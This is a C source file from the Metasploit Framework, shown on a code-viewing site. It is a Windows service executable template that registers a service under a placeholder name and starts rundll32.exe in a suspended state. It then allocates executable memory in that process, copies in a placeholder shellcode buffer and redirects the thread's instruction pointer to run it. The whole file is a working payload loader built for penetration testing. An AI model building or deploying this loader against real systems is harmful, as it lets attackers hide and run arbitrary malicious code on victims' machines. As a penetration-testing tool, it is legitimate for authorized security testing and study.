Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/data/templates/src/pe/exe_service/template.c
21844 views
1
#define WIN32_LEAN_AND_MEAN

2
#include <windows.h>

3


4
#define SCSIZE 8192

5


6
char cServiceName[32] = "SERVICENAME";

7


8
char bPayload[SCSIZE] = "PAYLOAD:";

9


10
SERVICE_STATUS ss;

11


12
SERVICE_STATUS_HANDLE hStatus = NULL;

13


14
#if BUILDMODE == 2

15
/* hand-rolled bzero allows us to avoid including ms vc runtime */

16
void inline_bzero(void *p, size_t l)

17
{

18
	BYTE *q = (BYTE *)p;

19
	size_t x = 0;

20
	for (x = 0; x < l; x++)

21
		*(q++) = 0x00;

22
}

23


24
#endif

25


26
/*

27
 *

28
 */

29
BOOL ServiceHandler( DWORD dwControl )

30
{

31
	if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN )

32
	{

33
		ss.dwWin32ExitCode = 0;

34
		ss.dwCurrentState  = SERVICE_STOPPED;

35
	}

36
	return SetServiceStatus( hStatus, &ss );

37
}

38


39
/*

40
 *

41
 */

42
VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )

43
{

44
	CONTEXT Context;

45
	STARTUPINFO si;

46
	PROCESS_INFORMATION pi;

47
	LPVOID lpPayload = NULL;

48


49
	inline_bzero( &ss, sizeof(SERVICE_STATUS) );

50
	inline_bzero( &si, sizeof(STARTUPINFO) );

51
	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

52


53
	si.cb = sizeof(STARTUPINFO);

54


55
	ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;

56


57
	ss.dwCurrentState = SERVICE_START_PENDING;

58


59
	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

60


61
	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );

62


63
	if ( hStatus )

64
	{

65
		ss.dwCurrentState = SERVICE_RUNNING;

66


67
		SetServiceStatus( hStatus, &ss );

68


69
		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )

70
		{

71
			Context.ContextFlags = CONTEXT_FULL;

72


73
			GetThreadContext( pi.hThread, &Context );

74


75
			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );

76
			if( lpPayload )

77
			{

78
				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );

79
#ifdef _WIN64

80
				Context.Rip = (ULONG_PTR)lpPayload;

81
#else

82
				Context.Eip = (ULONG_PTR)lpPayload;

83
#endif

84
				SetThreadContext( pi.hThread, &Context );

85
			}

86


87
			ResumeThread( pi.hThread );

88


89
			CloseHandle( pi.hThread );

90


91
			CloseHandle( pi.hProcess );

92
		}

93


94
		ServiceHandler( SERVICE_CONTROL_STOP );

95


96
		ExitProcess( 0 );

97
	}

98
}

99


100
/*

101
 *

102
 */

103
void main()

104
{

105
	SERVICE_TABLE_ENTRY st[] =

106
		{

107
			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },

108
			{ NULL, NULL }

109
		};

110
	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );

111
	return;

112
}

113


114